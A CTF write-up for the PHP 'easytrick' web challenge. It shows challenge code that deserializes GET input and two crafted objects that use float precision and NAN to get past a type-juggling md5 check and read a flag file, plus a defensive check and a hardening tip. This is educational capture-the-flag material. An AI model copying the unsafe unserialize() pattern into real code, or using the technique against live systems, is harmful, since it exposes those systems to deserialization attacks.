CTF easytrick

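This is a web challenge from the 13th National College Student Information Security Contest (online preliminary round).

The source code of the challenge is: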

<?php 
class trick{ 
    public $trick1; 
    public $trick2; 
    public function __destruct(){ 
        $this->trick1 = (string)$this->trick1; 
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ 
            die("你太长了"); 
        } 
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ 
            echo file_get_contents("/flag"); 
        } 
    } 
} 
highlight_file(__FILE__); 
unserialize($_GET['trick']); 

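I know of two solutions to this challenge: one relies on floating-point precision, the other on NAN or INF. In both, __destruct() casts only trick1 to a string, so trick2 can remain a float that has the same string form.

<?php
class trick{ 
    // trick1 becomes the string "0.1" in __destruct(); trick2 stays a float.
    // With PHP's default precision of 14 digits, trick2 also converts to "0.1".
    public $trick1 = 0.1; 
    public $trick2 = 0.100000000000001; 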
    public function __destruct(){ 
        $this->trick1 = (string)$this->trick1; 
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ 
            die("你太长了"); 
        } 
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ 
            echo file_get_contents("./flag.txt"); 
        } 
    } 
}

new trick;

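  or

<?php
class trick{ 
    // Both properties must hold the same special value (NAN here; the text
    // above also names INF) so that their string forms, and therefore their
    // md5 hashes, are equal. Mixing NAN with INF fails the md5 check.
    public $trick1 = NAN; 
    public $trick2 = NAN; 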
    public function __destruct(){ 
        $this->trick1 = (string)$this->trick1; 
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ 
            die("你太长了"); 
        } 
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ 
            echo file_get_contents("./flag.txt"); 
        } 
    } 
}

new trick;
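The following is an added example, not part of the original post or the challenge: it evaluates each of the challenge's conditions separately for a few constructed inputs, next to a stricter variant that only accepts strings. The function names challenge_checks and strict_checks are hypothetical.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// Mirrors the challenge's checks and reports each condition separately.
function challenge_checks($t1, $t2): array {
    $t1 = (string)$t1;   // only trick1 is cast, as in __destruct()
    return [
        'length_ok'     => strlen($t1) <= 5 && strlen((string)$t2) <= 5,
        'not_identical' => $t1 !== $t2,                    // string vs float differ by type
        'md5_equal'     => md5($t1) === md5((string)$t2),  // md5() works on the string form
        'loosely_diff'  => $t1 != $t2,                     // compared as numbers when possible
    ];
}

// Stricter variant: refuse anything that is not already a string, so neither
// the type difference nor float-to-string rounding can satisfy the checks.
function strict_checks($t1, $t2): bool {
    if (!is_string($t1) || !is_string($t2)) {
        return false;
    }
    return !in_array(false, challenge_checks($t1, $t2), true);
}

// Constructed sample inputs.
$samples = [
    'float pair, differs past 14 digits' => [0.1, 0.100000000000001],
    'NAN pair'                           => [NAN, NAN],
    'identical strings'                  => ['abc', 'abc'],
    'different strings'                  => ['abc', 'abd'],
];

foreach ($samples as $label => [$a, $b]) {
    echo $label, "\n";
    foreach (challenge_checks($a, $b) as $name => $passed) {
        printf("  %-14s %s\n", $name, $passed ? 'true' : 'false');
    }
    printf("  %-14s %s\n", 'strict_checks', strict_checks($a, $b) ? 'true' : 'false');
}
```

The property types are attacker-chosen because the challenge passes request input to unserialize(); calling unserialize($data, ['allowed_classes' => false]) keeps the trick class from being instantiated at all.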

  

posted @ 2020-10-16 22:09  白烬